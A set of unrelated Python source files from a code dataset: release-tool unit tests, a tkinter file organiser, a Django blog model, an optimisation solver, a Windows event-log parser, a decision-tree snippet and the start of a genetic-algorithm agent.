def test_if_area_not_support_or_ioc_then_return_string_without_epics_specified(self, _1):
module = 'dummy'
version = '1-0'
branch = None
area = 'python'
options = FakeOptions(area='python')
build = dls_release.create_build_object(options)
returned_message = dls_release.construct_info_message(
module, branch, area, version, build)
self.assertFalse('epics' in returned_message)
self.assertFalse(build.epics() in returned_message)
class TestCheckEpicsVersion(unittest.TestCase):
def test_given_epics_option_then_return_true(self):
e_module = 'some_epics_version'
e_option = 'specified_epics_version'
e_build = 'some_other_epics_version'
sure = dls_release.check_epics_version_consistent(
e_module, e_option, e_build)
self.assertTrue(sure)
@patch('dls_ade.dls_release.ask_user_input', return_value='n')
def test_given_no_epics_option_and_mismatched_module_and_build_epics_then_ask_user_for_input(self, mock_ask):
e_option = None
e_module = 'specified_epics_version'
e_build = 'some_other_epics_version'
sure = dls_release.check_epics_version_consistent(
e_module, e_option, e_build)
mock_ask.assert_called_once_with(ANY)
def test_given_no_epics_option_and_matching_module_and_build_epics_then_return_true(self):
e_option = None
e_module = 'specified_epics_version'
e_build = 'specified_epics_version'
sure = dls_release.check_epics_version_consistent(
e_module, e_option, e_build)
self.assertTrue(sure)
@patch('dls_ade.dls_release.ask_user_input', return_value='n')
def test_given_no_epics_option_and_matching_module_and_build_epics_except_build_specifies_64bit_then_return_true(self, mock_ask):
e_option = None
e_module = 'R3.14.11'
e_build = 'R3.14.11_64'
sure = dls_release.check_epics_version_consistent(
e_module, e_option, e_build)
self.assertFalse(mock_ask.call_count, "shouldn't have called ask_user_input()")
self.assertTrue(sure)
class TestGetModuleEpicsVersion(unittest.TestCase):
def test_given_vcs_object_can_return_filecontents_with_epics_version_mentioned_then_return_epics_version(self):
expected_epics = 'R3.14.12.3'
module_epics = dls_release.get_module_epics_version(FakeVcs())
self.assertEqual(module_epics, expected_epics)
def test_given_vcs_object_can_return_filecontents_without_epics_version_mentioned_then_return_empty_list(self):
FakeVcs = MagicMock()
FakeVcs.cat.return_value = 'BLGUI = $(SUPPORT)/BLGui/3-5'
module_epics = dls_release.get_module_epics_version(FakeVcs)
self.assertFalse(len(module_epics))
class TestPerformTestBuild(unittest.TestCase):
def setUp(self):
self.fake_build = MagicMock()
def test_given_any_option_when_called_then_return_string_and_test_failure_bool(self):
local_build = False
module, version = 'test', '1-2-3'
test_message, test_fail = dls_release.perform_test_build(
self.fake_build, local_build, module, version, FakeVcs())
self.assertIsInstance(test_message, str)
self.assertIsInstance(test_fail, bool)
def test_given_local_test_build_not_possible_when_called_then_return_specific_string(self):
local_build = False
module, version = 'test', '1-2-3'
self.fake_build.local_test_possible = MagicMock(return_value=False)
expected_message = "Local test build not possible since local system "
expected_message += "not the same OS as build server"
test_message, test_fail = dls_release.perform_test_build(
self.fake_build, local_build, module, version, FakeVcs())
self.assertEqual(test_message, expected_message)
def test_given_local_test_build_possible_then_returned_string_begins_with_specific_string(self):
local_build = False
module, version = 'test', '1-2-3'
expected_message = "Performing test build on local system"
test_message, test_fail = dls_release.perform_test_build(
self.fake_build, local_build, module, version, FakeVcs())
self.assertTrue(
test_message.startswith(expected_message),
"returned message does not start with expected string")
def test_given_local_test_possible_and_build_fails_then_return_test_failed(self):
local_build = False
module, version = 'test', '1-2-3'
self.fake_build.test.return_value = 1
test_message, test_fail = dls_release.perform_test_build(
self.fake_build, local_build, module, version, FakeVcs())
self.assertTrue(test_fail)
def test_given_local_test_possible_then_test_build_performed_once_with_vcs_and_version_as_args(self):
local_build = False
version = '0-1'
module = 'test'
vcs = FakeVcs(version=version)
self.fake_build.test.return_value = 1
dls_release.perform_test_build(self.fake_build, local_build, module, version, vcs)
self.fake_build.test.assert_called_once_with(module, version, vcs)
def test_given_test_possible_and_build_works_then_return_test_not_failed_and_message_ends_with_specific_string(self):
local_build = False
module, version = 'test', '1-2-3'
self.fake_build.test.return_value = 0
expected_message_end = "Test build successful. Continuing with build"
expected_message_end += " server submission"
test_message, test_fail = dls_release.perform_test_build(
self.fake_build, local_build, module, version, FakeVcs())
self.assertFalse(test_fail)
self.assertTrue(
test_message.endswith(expected_message_end),
"returned message does not end with expected string")
def test_given_test_possible_and_build_works_and_local_build_option_then_message_ends_without_continuation_info(self):
local_build = True
module, version = 'test', '1-2-3'
self.fake_build.test.return_value = 0
expected_message = "Performing test build on local system"
expected_message += '\nTest build successful.'
test_message, test_fail = dls_release.perform_test_build(
self.fake_build, local_build, module, version, FakeVcs())
self.assertEqual(test_message, expected_message)
class TestDetermineVersionToRelease(unittest.TestCase):
def setUp(self):
self.release = '0-1'
self.releases = ['0-1']
self.commit = 'abcdef'
def test_determine_version_to_release_allows_invalid_version_name(self):
# This is no longer checked in this function.
dls_release.determine_version_to_release(
'invalid-release',
'area',
False,
['invalid-release']
)
def test_determine_version_to_release_allows_commit_but_no_version(self):
# A warning is printed but the release continues.
version, commit_to_release = dls_release.determine_version_to_release(
None,
'area',
False,
['invalid-release'],
commit=self.commit
)
self.assertEqual(version, self.commit)
self.assertEqual(commit_to_release, None)
def test_determine_version_to_release_allows_commit_and_version(self):
version, commit_to_release = dls_release.determine_version_to_release(
self.release,
'area',
False,
['invalid-release'],
commit=self.commit
)
self.assertEqual(version, self.release)
self.assertEqual(commit_to_release, self.commit)
def test_determine_version_to_release_raises_ValueError_if_release_not_in_releases(self):
with self.assertRaises(ValueError):
dls_release.determine_version_to_release(
self.release,
'area',
False,
[]
)
def test_determine_version_to_release_raises_ValueError_if_commit_specified_but_tag_exists(self):
with self.assertRaises(ValueError):
dls_release.determine_version_to_release(
self.release,
'area',
False,
self.releases,
commit=self.commit
)
def test_determine_version_to_release_returns_release_and_None_if_no_commit_specified(self):
version, commit_to_release = dls_release.determine_version_to_release(
self.release,
'area',
False,
self.releases
)
self.assertEqual(version, '0-1')
self.assertEqual(commit_to_release, None)
def test_determine_version_to_release_returns_next_version_and_HEAD_if_next_version_specified(self):
version, commit_to_release = dls_release.determine_version_to_release(
None,
'area',
True,
self.releases
)
self.assertEqual(version, '0-2')
self.assertEqual(commit_to_release, 'HEAD')
def test_determine_version_to_release_returns_hash_if_only_commit_specified(self):
version, commit_to_release = dls_release.determine_version_to_release(
None,
'area',
False,
self.releases,
commit=self.commit
)
self.assertEqual(version, self.commit)
self.assertEqual(commit_to_release, None)
def test_normalise_release_returns_valid_release(self):
old_release = '1-1'
new_release = dls_release.normalise_release(old_release, 'support')
self.assertEqual(old_release, new_release)
def test_normalise_release_replaces_dot_with_dash(self):
old_release = '1.1'
new_release = dls_release.normalise_release(old_release, 'python')
self.assertEqual(new_release, '1-1')
def test_normalise_release_raises_ValueError_if_release_not_valid(self):
with self.assertRaises(ValueError):
dls_release.normalise_release('1.1abc3', 'ioc')
with self.assertRaises(ValueError):
dls_release.normalise_release('aaa', 'ioc')
class FakeOptions(object):
def __init__(self,**kwargs):
self.rhel_version = kwargs.get('rhel_version', None)
self.epics_version = kwargs.get('epics_version', None)
self.windows = kwargs.get('windows', None)
self.area = kwargs.get('area', 'support')
self.force = kwargs.get('force', None)
self.git = kwargs.get('git', False)
self.branch = kwargs.get('branch', None)
self.next_version = kwargs.get('next_version', None)
self.skip_test = kwargs.get('skip_test', False)
self.local_build = kwargs.get('local_build', False)
class FakeVcs(object):
def __init__(self, **kwargs):
self.version = kwargs.get('version', None)
def cat(self,filename, version=None):
file_contents = '''
CALC = $(SUPPORT)/calc/3-1
BLGUI = $(SUPPORT)/BLGui/3-5
# If using the sequencer, point SNCSEQ at its top directory:
#SNCSEQ=$(EPICS_BASE)/../modules/soft/seq
# EPICS_BASE usually appears last so other apps can override stuff:
EPICS_BASE=/dls_sw/epics/R3.14.12.3/base
# Set RULES here if you want to take build rules from somewhere
# other than EPICS_BASE:
#RULES=/path/to/epics/support/module/rules/x-y
'''
return file_contents
if __name__ == '__main__':
# buffer option suppresses stdout generated from tested code
unittest.main(buffer=True)
| StarcoderdataPython |
9709453 | import os
import shutil
import tkinter
from tkinter import Button, Entry, Frame, Label, Listbox, OptionMenu, StringVar, filedialog
from tkinter.constants import BOTTOM, END, TOP
import time
def organiser_app_window():
mainscreen = tkinter.Tk()
mainscreen.title("organize it")
global scvalue, file_path, result, options
def copy_files_as_extention(main_folders):
try:
main_folder = f"{main_folders}"
main_folder = main_folder.replace("\\","\\\\")
subfolders = [main_folder]
my_folders = []
exts = []
for folder in subfolders:
subfolders.remove(folder)
my_folders.append(folder)
files = os.listdir(folder)
for file in files:
if not os.path.isdir(os.path.join(folder,file)):
ext = file.split('.')[-1]
exts.append(ext)
else:
subfolder = os.path.join(folder,file)
subfolders.append(subfolder)
for ex in exts:
if not os.path.isdir(os.path.join(main_folder,"types of file")):
os.mkdir(os.path.join(main_folder,"types of file"))
if not os.path.isdir(os.path.join(os.path.join(main_folder,"types of file"),ex)):
os.mkdir(os.path.join(os.path.join(main_folder,"types of file"),ex))
for folder in my_folders:
my_folders.remove(folder)
files = os.listdir(folder)
for file in files:
if not os.path.isdir(os.path.join(folder,F"{file}")):
ext = file.split('.')[-1]
try:
folder = folder.replace("\\","/")
main_folder = main_folder.replace("\\", "/")
shutil.copy(f"{folder}/{file}",f"{main_folder}/types of file/{ext}/{file}")
results.insert(END,f"{file} copied successfully")
except shutil.SameFileError:
results.insert(END,f"{file} already exist")
except PermissionError:
results.insert(END,f"coping file {file} permission denied")
except Exception as e:
results.insert(END,f"ERROR! unable to copy")
mainscreen.update()
else:
subfolder = os.path.join(folder,file)
my_folders.append(subfolder)
process.set("process has been done.\n you can exit the app now")
process_completed.update()
except Exception as e:
process.set("failed! check folder is selected")
def move_files_as_extention(main_folders):
try:
main_folder = f"{main_folders}"
main_folder = main_folder.replace("\\","\\\\")
subfolders = [main_folder]
my_folders = []
exts = []
for folder in subfolders:
subfolders.remove(folder)
my_folders.append(folder)
files = os.listdir(folder)
for file in files:
if not os.path.isdir(os.path.join(folder,file)):
ext = file.split('.')[-1]
exts.append(ext)
else:
subfolder = os.path.join(folder,file)
subfolders.append(subfolder)
for ex in exts:
if not os.path.isdir(os.path.join(main_folder,"types of file")):
os.mkdir(os.path.join(main_folder,"types of file"))
if not os.path.isdir(os.path.join(os.path.join(main_folder,"types of file"),ex)):
os.mkdir(os.path.join(os.path.join(main_folder,"types of file"),ex))
for folder in my_folders:
my_folders.remove(folder)
files = os.listdir(folder)
for file in files:
if not os.path.isdir(os.path.join(folder,F"{file}")):
ext = file.split('.')[-1]
try:
folder = folder.replace("\\","/")
main_folder = main_folder.replace("\\", "/")
shutil.move(f"{folder}/{file}",f"{main_folder}/types of file/{ext}/{file}")
results.insert(END,f"{file} moved successfully")
del file
except shutil.SameFileError:
results.insert(END,f"{file} already exist")
except PermissionError:
results.insert(END,f"moving file {file} permission denied")
except Exception as e:
results.insert(END,f"ERROR! unable to move")
mainscreen.update()
else:
subfolder = os.path.join(folder,file)
my_folders.append(subfolder)
process.set("process has been done.\n you can exit the app now")
process_completed.update()
except Exception as e:
process.set("failed! check folder is selected")
options = ["all files"]
def open_file():
file_path = filedialog.askdirectory(title='select file')
file_path = file_path.replace("/", "\\")
scvalue.set(file_path)
folder_path.set(file_path)
view_bar.update()
b2.update()
b3.update()
b4.update()
try:
main_folder = f"{file_path}"
main_folder = main_folder.replace("\\","\\\\")
subfolders = [main_folder]
exts = []
opt_ext = []
for folder in subfolders:
subfolders.remove(folder)
files = os.listdir(folder)
for file in files:
if not os.path.isdir(os.path.join(folder,file)):
ext = file.split('.')[-1]
exts.append(ext)
else:
subfolder = os.path.join(folder,file)
subfolders.append(subfolder)
for i in exts:
if i not in opt_ext:
opt_ext.append(i)
mainscreen.update()
process.set("folder has been selected")
process_completed.update()
except Exception as e:
process.set("failed! check folder is selected")
def create_shortcut_file(main_folders):
try:
main_folder = f"{main_folders}"
main_folder = main_folder.replace("\\","\\\\")
subfolders = [main_folder]
my_folders = []
exts = []
for folder in subfolders:
subfolders.remove(folder)
my_folders.append(folder)
files = os.listdir(folder)
for file in files:
if not os.path.isdir(os.path.join(folder,file)):
ext = file.split('.')[-1]
exts.append(ext)
else:
subfolder = os.path.join(folder,file)
subfolders.append(subfolder)
for ex in exts:
if not os.path.isdir(os.path.join(main_folder,"types of shortcut file")):
os.mkdir(os.path.join(main_folder,"types of shortcut file"))
if not os.path.isdir(os.path.join(os.path.join(main_folder,"types of shortcut file"),ex)):
os.mkdir(os.path.join(os.path.join(main_folder,"types of shortcut file"),ex))
for folder in my_folders:
my_folders.remove(folder)
files = os.listdir(folder)
for file in files:
if not os.path.isdir(os.path.join(folder,F"{file}")):
ext = file.split('.')[-1]
try:
os.symlink(f"{folder}\\{file}",f"{main_folder}\\types of shortcut file\\{ext}\\shortcut_{file}")
results.insert(END,f"{file} shortcut created successfully")
except Exception as e:
results.insert(END,f"ERROR! unable to make shortcut or run as administrator")
mainscreen.update()
else:
subfolder = os.path.join(folder,file)
my_folders.append(subfolder)
process.set("process has been done.\n you can exit the app now")
process_completed.update()
except Exception as e:
process.set("failed! check folder is selected\n or run as administrator")
note = Label(mainscreen, text="💐welcome! to the app 🎇🎉💐\n\n steps:\n\n 1. select folder by clicking select folder button\n 2. click copy or move button to copy or move\n 3. look the bottom bars to check results and processes\n NOTE: I RECOMEND YOU TO USE COPY METHOD 😁" ,font="algerian 14 italic")
note.pack(side=TOP)
folder_path = StringVar()
scvalue = StringVar()
view_bar = Entry(mainscreen, text=scvalue,state="readonly",border="10",width="100")
view_bar.pack()
def folder_open():
os.startfile(folder_path.get())
f1 = Frame(mainscreen)
b1 = Button(f1, text="select folder",fg="black", command=open_file, border="10",font="algerian 12 bold")
b1.grid(row=0, columnspan=2)
b4 = Button(f1, text="open folder",command=folder_open, border="10", justify="center",font="algerian 12 bold", bg="aqua")
b4.grid(row=1,columnspan=2)
b2 = Button(f1, text="copy and arrange\n folder", bg="green",fg="white", command=lambda:copy_files_as_extention(folder_path.get()), border="10", justify="center",font="algerian 12 bold")
b2.grid(row=2, column=0)
b3 = Button(f1, text="move and arrange\n folder", bg="red",fg="white", command=lambda:move_files_as_extention(folder_path.get()), border="10", justify="center",font="algerian 12 bold")
b3.grid(row=2, column=1)
b3 = Button(f1, text="create shortcut\n and arrange\n folder",padx="100", bg="orange",fg="white", command=lambda:create_shortcut_file(folder_path.get()), border="10", justify="center",font="algerian 12 bold")
b3.grid(row=3, columnspan=2)
f1.pack()
f2 = Frame(mainscreen)
result = StringVar()
res = Label(f2, text="processes:",font="algerian 15 bold")
res.grid(row=0, column=0)
results = Listbox(f2,border="8",width="80",height="20", justify="left",fg="red",font="algerian 8 bold")
results.grid(row=0, column=1)
pros = Label(f2, text="result:",font="algerian 15 bold")
pros.grid(row=1, column=0)
process = StringVar()
process_completed = Entry(f2, text=process,border="10",width="40", justify="left",fg="green" ,font="algerian 16 bold")
process_completed.grid(row=1, column=1)
f2.pack(side=BOTTOM)
mainscreen.mainloop()
if __name__ == "__main__":
organiser_app_window() | StarcoderdataPython |
3470308 | <reponame>JiangNanMax/mysite
from django.db import models
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import GenericRelation
from ckeditor.fields import RichTextField
from read_statistics.models import ReadNumExpandMethod, ReadDetail
##
from mdeditor.fields import MDTextField
# Create your models here.
class BlogType(models.Model):
type_name = models.CharField(max_length=20)
def __str__(self):
return self.type_name
class Blog(models.Model, ReadNumExpandMethod):
title = models.CharField(max_length=50)
blog_type = models.ForeignKey(BlogType, on_delete=models.CASCADE)
#content = RichTextField()
content = MDTextField()
author = models.ForeignKey(User, on_delete=models.CASCADE)
read_details = GenericRelation(ReadDetail)
created_time = models.DateTimeField(auto_now_add=True)
last_updated_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "<Blog: %s>" % self.title
class Meta:
ordering = ['-created_time']
| StarcoderdataPython |
8092010 | <filename>src/udgs/models/solve_lexicographic_pg.py
from udgs.models.forces_utils import ForcesException
import numpy as np
from udgs.models.forces_def import params, p_idx
from udgs.models.forces_def.car_util import set_p_car
def solve_optimization(model, solver, n_players, problem, behavior,
k: int, lex_level, next_spline_points,
solver_it, solver_time, solver_cost,
opt_cost1, opt_cost2):
"""
model: model settings
solver: compiled solver
n_players: number of players involved in the game
problem: problem definition contains xinit, x0, all_params for the solver
behaviour: parameters for cost function
k: current index in simulation
lex_level: lexicographic level
next_spline_points: spline points for the player
solver_it, solver_time, solver_cost: array for keeping track of info
optCost1, optcost2: terminal cost for cumulative slack and cumulative rules
"""
# Set runtime parameters (the only really changing between stages are the next control points of the spline)
p_vector = set_p_car(
SpeedLimit=behavior[p_idx.SpeedLimit],
TargetSpeed=behavior[p_idx.TargetSpeed],
OptCost1=opt_cost1,
OptCost2=opt_cost2,
Xobstacle=behavior[p_idx.Xobstacle],
Yobstacle=behavior[p_idx.Yobstacle],
TargetProg=behavior[p_idx.TargetProg],
kAboveTargetSpeedCost=behavior[p_idx.kAboveTargetSpeedCost],
kBelowTargetSpeedCost=behavior[p_idx.kBelowTargetSpeedCost],
kAboveSpeedLimit=behavior[p_idx.kAboveSpeedLimit],
kLag=behavior[p_idx.kLag],
kLat=behavior[p_idx.kLat],
pLeftLane=behavior[p_idx.pLeftLane],
kReg_dAb=behavior[p_idx.kReg_dAb],
kReg_dDelta=behavior[p_idx.kReg_dDelta],
carLength=behavior[p_idx.carLength],
minSafetyDistance=behavior[p_idx.minSafetyDistance],
kSlack=behavior[p_idx.kSlack],
points=next_spline_points[:, :, k],
n_players=n_players
)
problem["all_parameters"] = np.tile(p_vector, (model.N,))
n_states = params.n_states
n_inputs = params.n_inputs
# Time to solve the NLP!
output, exitflag, info = solver.solve(problem)
# Make sure the solver has exited properly.
if exitflag < 0:
if exitflag == -7:
for player in range(n_players):
# It makes sure that progress is correctly initialized (i.e. bigger than TargetProgress)
problem['x0'][-3 - n_states * player] = behavior[p_idx.TargetProg] + 1
# It makes sure that cumulative costs are not < 0
if problem['x0'][-2 - n_states * player] < 0:
problem['x0'][-2] = 0
if problem['x0'][-1 - n_states * player] < 0:
problem['x0'][-1] = 0
output, exitflag, info = solver.solve(problem)
if exitflag == -7:
# reinitialize the problem
xinit = problem['xinit']
initialization = np.tile(np.append(np.zeros(n_inputs * n_players), xinit), model.N)
problem["x0"] = initialization
output, exitflag, info = solver.solve(problem)
if exitflag == -7:
print(f"Stalled line search at simulation step {k}, check solver initialization")
solver_it[k, lex_level] = info.it
solver_time[k, lex_level] = info.solvetime
solver_cost[k, lex_level] = info.pobj
else:
print(f"At simulation step {k}")
raise ForcesException(exitflag)
else:
solver_it[k, lex_level] = info.it
solver_time[k, lex_level] = info.solvetime
solver_cost[k, lex_level] = info.pobj
return output, problem, p_vector
def solve_lexicographic(model, solver, num_players, problem,
behavior_init, behavior_first, behavior_second, behavior_third,
k: int, lexi_iter, next_spline_points,
solver_it_lexi, solver_time_lexi, solver_cost_lexi,
sim_params):
"""
model: model settings
solver: compiled solver
n_players: number of players involved in the game
problem: problem definition contains xinit, x0, all_params for the solver
behavior_init, behavior_first, behavior_second, behavior_third: parameters for cost function
k: current index in simulation
lex_level: lexicographic level
next_spline_points: spline points for the player
solver_it_lexi, solver_time_lexi, solver_cost_lexi: array for keeping track of info
sim_params: simulation parameters
"""
# initialization
if k == 0:
output, problem, p_vector = solve_optimization(
model, solver, num_players, problem, behavior_init, k, 0,
next_spline_points, solver_it_lexi, solver_time_lexi,
solver_cost_lexi, behavior_init[p_idx.OptCost1],
behavior_init[p_idx.OptCost2])
problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
# Lexicographic simulation
for lex_level in range(lexi_iter):
if lex_level == 0:
output, problem, p_vector = solve_optimization(
model, solver, num_players, problem, behavior_first,
k, lex_level, next_spline_points, solver_it_lexi,
solver_time_lexi, solver_cost_lexi,
behavior_first[p_idx.OptCost1],
behavior_first[p_idx.OptCost2])
problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
temp = output["all_var"].reshape(model.nvar, model.N, order='F')
row, col = temp.shape
slackcost = 0
for zz in range(num_players):
upd_s_idx = zz * params.n_states + (num_players - 1) * params.n_inputs
slackcost = slackcost + temp[params.x_idx.CumSlackCost + upd_s_idx, col - 1]
elif lex_level == 1:
output, problem, p_vector = solve_optimization(
model, solver, num_players, problem, behavior_second,
k, lex_level, next_spline_points, solver_it_lexi,
solver_time_lexi, solver_cost_lexi,
slackcost + sim_params.safety_slack,
behavior_second[p_idx.OptCost2])
problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
temp = output["all_var"].reshape(model.nvar, model.N, order='F')
row, col = temp.shape
cumlatcost = 0
for zz in range(num_players):
upd_s_idx = zz * params.n_states + (num_players - 1) * params.n_inputs
cumlatcost = cumlatcost + temp[params.x_idx.CumLatSpeedCost + upd_s_idx, col - 1]
slackcost = 0
for zz in range(num_players):
upd_s_idx = zz * params.n_states + (num_players - 1) * params.n_inputs
slackcost = slackcost + temp[params.x_idx.CumSlackCost + upd_s_idx, col - 1]
else:
output, problem, p_vector = solve_optimization(
model, solver, num_players, problem, behavior_third,
k, lex_level, next_spline_points, solver_it_lexi,
solver_time_lexi, solver_cost_lexi,
slackcost + sim_params.safety_slack, cumlatcost + sim_params.safety_lat)
# Extract output and initialize next iteration with current solution shifted by one stage
problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
problem["x0"][model.nvar * (model.N - 1): model.nvar * model.N] = output["all_var"][model.nvar * (
model.N - 1):model.nvar * model.N]
temp = output["all_var"].reshape(model.nvar, model.N, order='F')
return temp, problem, p_vector
| StarcoderdataPython |
3310175 | import logging
import re
import argparse
import glob
import json
import time
import sys
import win32evtlog
import win32api
import win32con
import pywintypes
import os
OUTPUT_FORMATS = "json".split(" ")
LANGID = win32api.MAKELANGID(win32con.LANG_NEUTRAL, win32con.SUBLANG_NEUTRAL)
DLLCACHE = {}
DLLMSGCACHE = {}
LOGGER = logging.getLogger("kpulp")
LOGGER.setLevel(logging.INFO)
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
def loadDLLsInCache(directory=None):
if directory:
for source in os.listdir(directory):
dirpath = os.path.join(directory, source)
if os.path.isdir(dirpath):
for e in os.listdir(dirpath):
if e.lower().endswith(".dll"):
# dllHandle = loadDLL(dllName)
dllPath = os.path.join(dirpath, e)
LOGGER.debug(
"Loading {} for {}".format(dllPath, source))
if source not in DLLCACHE:
DLLCACHE[source] = {}
try:
dllHandle = loadDLL(dllPath)
DLLCACHE[source][e] = dllHandle
except pywintypes.error, exc:
LOGGER.warn(
"Error loading {}: {}".format(dllPath, e))
return
from IPython import embed
embed()
keyName = u'SYSTEM\\CurrentControlSet\\Services\\EventLog'
h1 = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, keyName)
for (typeName, _, __, ___) in win32api.RegEnumKeyEx(h1):
keyName = u'SYSTEM\\CurrentControlSet\\Services\\EventLog\\{}'.format(
typeName)
h2 = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, keyName)
for (sourceName, _, __, ___) in win32api.RegEnumKeyEx(h2):
keyName = u'SYSTEM\\CurrentControlSet\\Services\\EventLog\\{}\\{}'.format(
typeName, sourceName)
h3 = win32api.RegOpenKeyEx(
win32con.HKEY_LOCAL_MACHINE, keyName, 0, win32con.KEY_READ)
LOGGER.debug("Enumerating {}".format(keyName))
try:
dllNames = win32api.RegQueryValueEx(
h3, "EventMessageFile")[0].split(";")
if sourceName not in DLLCACHE:
DLLCACHE[sourceName] = {}
for dllName in dllNames:
if dllName:
dllHandle = loadDLL(dllName)
DLLCACHE[sourceName][dllName] = dllHandle
except pywintypes.error, e:
if e.args[0] == 2: # value not found
pass
else:
raise e
def loadDLL(dllName):
dllPath = win32api.ExpandEnvironmentStrings(dllName)
LOGGER.debug("Loading library {}".format(dllPath))
dllHandle = win32api.LoadLibraryEx(
dllPath, 0, win32con.LOAD_LIBRARY_AS_DATAFILE)
return dllHandle
def expandString(event):
cachekey = event.SourceName + "/" + str(event.EventID)
try:
if cachekey in DLLMSGCACHE:
dllName = DLLMSGCACHE[cachekey]
if dllName is None:
return ""
try:
dllHandle = DLLCACHE[event.SourceName][dllName]
except KeyError:
from IPython import embed
embed()
data = win32api.FormatMessageW(win32con.FORMAT_MESSAGE_FROM_HMODULE,
dllHandle, event.EventID, LANGID, event.StringInserts)
return data
elif event.SourceName not in DLLCACHE:
LOGGER.warn("Event source not in cache".format(
event.SourceName, event.EventID))
DLLMSGCACHE[cachekey] = None
else:
for (dllName, dllHandle) in DLLCACHE[event.SourceName].items():
try:
data = win32api.FormatMessageW(win32con.FORMAT_MESSAGE_FROM_HMODULE,
dllHandle, event.EventID, LANGID, event.StringInserts)
DLLMSGCACHE[cachekey] = dllName
return data
except win32api.error:
pass # not in this DLL
except SystemError, e:
pass
# print str(e)
# from IPython import embed
# embed()
except pywintypes.error:
pass
LOGGER.warn("Unable to expand data for {} EventID: {}".format(
event.SourceName, event.EventID))
DLLMSGCACHE[cachekey] = None # no DLLs known to expand this message
# from IPython import embed
# embed()
return ""
def readevents(path):
logHandle = win32evtlog.OpenBackupEventLog(None, path) # None=NULL means local host
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ
total = win32evtlog.GetNumberOfEventLogRecords(logHandle)
LOGGER.info("Total number of records for {} is: {}".format(path, total))
# if "security" in path.lower():
# logType = "Security"
# elif "application" in path.lower():
# logType = "Application"
# elif "system" in path.lower():
# logType = "System"
# else:
# LOGGER.error("Unknown log type - put something in path")
# sys.exit(-1)
event_dict = None
while True:
events = win32evtlog.ReadEventLog(logHandle, flags, 0)
if events:
for event in events:
event_dict = {}
event_dict['TimeGenerated'] = time.strftime(
"%#c", time.localtime(int(event.TimeGenerated)))
event_dict['SourceName'] = event.SourceName
event_dict['Id'] = event.EventID
event_dict['EventType'] = event.EventType
event_dict['ComputerName'] = event.ComputerName
if event.StringInserts:
event_dict['data'] = "|".join(event.StringInserts)
description = expandString(event)
event_dict['Description'] = description
if description:
event_dict.update(description_to_fields(description))
first_line = description.split("\r\n")[0]
event_dict['Short Description'] = first_line
yield event_dict
else:
break
def description_to_fields(description):
event_dict = {}
prefix = ''
for l in description.split("\r\n"):
#####
# WHY, oh Why? Well, Imagine the following record sample
###
# An account failed to log on.
# Subject:
# Security ID: S-1-5-21-3333333333-4444444444-5555555555-6666
# Account Name: joebloggs
# Account Domain: DOMAIN
# Logon ID: 0x8be966a
# Logon Type: 2
# Account For Which Logon Failed:
# Security ID: NULL SID
# Account Name: administrator
# Account Domain: SYSEM
###
# See that Security ID and Account Name are mentioned twice? So what we will do
# is we will prefix the first one with "Subject" and 2nd one with Account For Which....
#
m = re.match("^([A-Za-z ]+):\s*$", l)
if m: # we've hit a prefix like "Subject:"
prefix = m.group(1)
continue
if prefix and l == '': # end of prefix
prefix = ''
continue
m = re.match("^\t*([A-Za-z ]+):\t{1,}(.+)", l)
if m:
(k, v) = m.groups()
if prefix:
new_key = prefix + " " + k
else:
new_key = k
if new_key in event_dict:
LOGGER.warn(
"Key {} already in dict with value: {} ({})".format(
new_key, event_dict[new_key]))
#timelion will be happy now :)
event_dict[new_key.replace(" ","_")] = v
return event_dict
def main():
parser = argparse.ArgumentParser(description='Parse EVTX files')
parser.add_argument('--output', "-o", metavar='OUTPUT', type=str,
help='Destination, if - then STDOUT (default)', default='-')
parser.add_argument('logfiles', metavar='LOGFILE.evtx', type=str, nargs='+',
help='List of logfiles to parse. Will expand wildcards.')
parser.add_argument('--output-format', "-f", type=str, dest="format", choices=OUTPUT_FORMATS,
default="json",
help='Output format, choices are:' + ",".join(OUTPUT_FORMATS))
parser.add_argument('--additional-dlls', type=str, dest="extradllpath",
help='Directory with additoinal DLLs to load (as created by dllraider)')
parser.add_argument('--debug', "-d", action="store_true",
help='Debug level messages')
args = parser.parse_args()
if args.debug:
LOGGER.setLevel(logging.DEBUG)
if args.output == "-":
output = sys.stdout
else:
output = open(args.output, "wb")
loadDLLsInCache(args.extradllpath)
all_logs = [item for sublist in [
glob.glob(k) for k in args.logfiles] for item in sublist]
for lf in all_logs:
LOGGER.info("Processing {}".format(lf))
try:
for record in readevents(lf):
if args.format == "json":
txt = json.dumps(record) + "\r\n"
output.write(txt)
LOGGER.debug(txt)
except pywintypes.error,e:
LOGGER.error(str(e))
if __name__ == '__main__':
main()
| StarcoderdataPython |
9753503 | <filename>RefMaterials/Machine-Learning/decision-tree.py
def entropy(class_probabilities):
return sum(-p * math.log(p,2)
for p in class_probabilities
if p) #ignore zero probability
def class_probabilities(labels):
total_count = len(labels)
return [count / total_count
for count in Counter(labels).values()]
def data_entropy(labeled_data):
labels = [label for _, label in labeled_data]
probabilities = class_probabilities(labels)
return entropy(probabilities)]
def partition_entropy(subsets):
total_count = sum(len(subset) for subset in subsets)
return sum(data_entropy(subset) * len(subset) / total_count
for subset in subsets)
#ID3 algorithm
#if all same label make leaf node
#
#choose partition with the lowest entropy
#add decision node based on chosen atribute
#recur on subset
def partition_by(inputs, attribute):
groups = defaultdict(list)
for input in inputs:
key = input[0][attribute]
groups[key].append(input)
return groups
def partition_entropy_by(inputs, attribute):
partitions = partition_by(inputs, attribute)
return partition_entropy(partition.values())
# | StarcoderdataPython |
275378 | <filename>physical_arm_learning/genetic_agent.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 10 16:13:27 2020
@author: stan
"""
import numpy as np
class GeneticAgent(object):
"""
old_generation is a list of vector, reward pairs
"""
def __init__(self, p_mutation, p_crossover, p_replication, diversity_factor,
max_mutations, max_cross, coordinate_range, reward_th):
np.random.seed()
# Probabilities of mutation, crossover and replication
self.p_mutation = p_mutation
